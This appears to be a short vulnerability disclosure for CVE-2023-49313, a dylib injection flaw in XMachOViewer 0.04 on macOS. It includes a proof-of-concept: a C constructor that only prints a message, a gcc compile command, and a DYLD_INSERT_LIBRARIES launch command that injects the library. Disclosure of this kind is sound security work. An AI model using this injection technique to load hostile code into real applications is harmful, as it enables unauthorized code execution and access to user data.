/CVE-2023-49313

A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.

CVE-2023-49313

A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.

Captura de Tela 2023-11-27 às 20 06 48

Portable version for macOS

  • First we'll write the dylib
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • Compile gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • And Inject it: DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

This will open the application and run dylib. After closing the application, we see it in the terminal:

Captura de Tela 2023-11-27 às 19 52 57